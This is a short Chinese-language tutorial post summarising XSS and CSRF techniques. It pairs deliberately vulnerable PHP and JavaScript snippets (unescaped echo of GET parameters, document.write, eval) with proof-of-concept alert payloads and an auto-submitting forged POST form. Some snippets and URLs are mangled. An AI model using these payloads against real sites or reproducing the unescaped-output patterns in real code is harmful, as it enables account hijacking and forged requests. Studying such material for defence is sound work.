xss篇:
1,普通的反射型xss
<?php echo $_GET['XSS'];?>
POC:http://HdhCmsTesttest.org/test.php?xss=<script>alert(1)</script>
2,xss反射
<?php echo $_GET; ?>POC:http://HdhCmsTesttest.org/test.php?<script>alert(1)</script>
3,被引号包围的xss
<?php echo "<a href='$_GET['XSS']'>A</A>";?>
POC 1:http://HdhCmsTesttest.org/test.php?xss="/><script>alert(1)</script><"
POC 2:http://HdhCmsTesttest.org/test.php?xss=javascript:alert(1);
4,在某种情况下过滤了<>但是没有过滤引号
<?php echo "<img src="'$_GET['XSS']'"/>";?>
POC:http://HdhCmsTesttest.org/test.php?xss=#"onerror=alert(11);//
5,dom反射
<script>document.write(location.href);</script>
poc:http://HdhCmsTesttest.org/test.php#<img/src=# onerror=alert(1)>
火狐等 浏览器 无效 6,富文本绕过:<base>
<base> 标签为页面上的所有链接规定默认地址或默认目标。
如:<base href="http://HdhCmsTesttest.org">
<a href="xss">x</a>href里的URL是http://HdhCmsTesttest.org/xss
7,eval
<script>var url = window.location.href;
eval(url)</script>
poc:http://HdhCmsTesttest.org/test.php#alert(String.fromCharCode(88, 83, 83))
从安全的角度讲所有的输出输入的都是有害的,javascript从的输出有:
document.write()
innerHTML=""
eval()
csrf篇
post伪造包提交poc:
<form action="http://HdhCmsTesttest测试数据/test.s html " method="POST" name="csrf"> <input type="text" name="mobile" value="18265464645<img/src=# onerror=alert(1)>"> <input type="text" name="currTime" value="1380530205097"> <input type="text" name="city" value=""> <input type="text" name="isMini" value="5"> </form> <script> document.csrf.submit()</script>
查看更多关于xss与csrf自我技巧总结 - 网站安全 - 自学php的详细内容...